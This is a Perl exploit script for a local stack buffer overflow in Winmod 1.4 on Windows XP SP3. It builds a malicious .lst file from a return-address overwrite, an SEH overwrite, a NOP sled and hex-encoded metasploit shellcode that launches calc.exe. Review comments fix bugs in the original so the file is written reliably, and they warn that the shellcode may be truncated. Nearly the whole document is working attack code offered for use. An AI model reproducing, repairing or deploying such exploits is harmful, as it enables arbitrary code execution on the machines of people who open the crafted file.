
winmodlstxpsp3-overflow.txt

Posted on 28 July 2009

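#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH)
# http://www.software112.com/products/winmod+download.html
#
# Exploit for Windows XP SP3 (en)
#
# by corelan - c0d3r
# Greetings to Saumil and SK
#
# Proof of concept: builds a malformed .lst file and writes it into the
# Winmod install directory; the target must then open that file. The
# payload is a metasploit win32_exec stub that launches calc.exe.
# The RET and SEH handler addresses below are specific to the XP SP3 (en)
# build this was written against and must be re-derived for any other
# target (they are not portable across service packs or locales).
#
# Review notes:
#   - The original called 2-arg open() with a single-quoted argument,
#     open(FILE,'>$sploitfile'); single quotes do not interpolate, so it
#     created a file literally named "$sploitfile" in the current
#     directory, never the intended path, and no error was ever checked.
#     Replaced with 3-arg open, a lexical handle, error checks and binmode
#     so the payload bytes reach disk unchanged.
#   - The install path was in double quotes, where "\x" followed by "pl"
#     is a malformed hex escape and "\p"/"\w" are dropped with warnings,
#     so the path did not resolve. It is now single-quoted.
#   - The metasploit header says Size=343, but the shellcode reproduced
#     here is 330 bytes (20 lines of 16 plus a 10-byte tail). This copy
#     may be truncated; verify against the original advisory before use.

use strict;
use warnings;

# Single quotes: no escape processing, so the backslashes survive intact.
my $sploitfile = 'c:\program files\winmod\xpl_sp3.lst';

# Build the malformed .lst contents. Layout, in order:
#   [500 x 'A'][RET][2380 x 'A'][nSEH][SEH][20 x NOP][shellcode]
# The saved return address is overwritten first; the SEH record overwrite
# is the fallback path if an exception fires before that return is taken.
# Returns the raw byte string.
sub build_payload {
    my $ret_addr = 0x76B2D577;   # saved-return-address overwrite, XP SP3 (en)
    my $seh_addr = 0x7C972ECD;   # SEH handler overwrite, XP SP3 (en)

    my $filler = ("\x41" x 500)
               . pack('V', $ret_addr)
               . ("\x41" x (2880 - 500));

    my $nseh = "\xEB\x06\x90\x90";   # short jmp +6: hop over the SEH record
    my $seh  = pack('V', $seh_addr);
    my $nop  = "\x90" x 20;

    ## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
    my $shellcode =
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" .
        "\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" .
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41" .
        "\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59" .
        "\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c" .
        "\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45" .
        "\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66" .
        "\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f" .
        "\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59" .
        "\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a" .
        "\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44" .
        "\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77" .
        "\x6c\x6e\x6b\x46\x61\x5a\x6b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a" .
        "\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b" .
        "\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57" .
        "\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f" .
        "\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73" .
        "\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39" .
        "\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45" .
        "\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45" .
        "\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";

    return $filler . $nseh . $seh . $nop . $shellcode;
}

# Write $data to $path as raw bytes. Dies with the OS error on any failure
# to open, write or close, so a silently missing or partial file cannot be
# mistaken for success.
sub write_payload {
    my ($path, $data) = @_;

    open my $fh, '>', $path
        or die "[-] Cannot open $path for writing: $!\n";
    binmode $fh;                      # no CRLF translation of payload bytes
    print {$fh} $data
        or die "[-] Write to $path failed: $!\n";
    close $fh                         # buffered write errors surface here
        or die "[-] Close of $path failed: $!\n";
    return;
}

# Entry point: build the payload and drop it at the hard-coded install path.
sub main {
    print "[+] Writing exploit file\n";
    write_payload($sploitfile, build_payload());
    print "[+] Exploit file written : $sploitfile\n";
    print "[+] File's name is xpl_sp3.lst\n";
    return 0;
}

exit main() unless caller;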

 
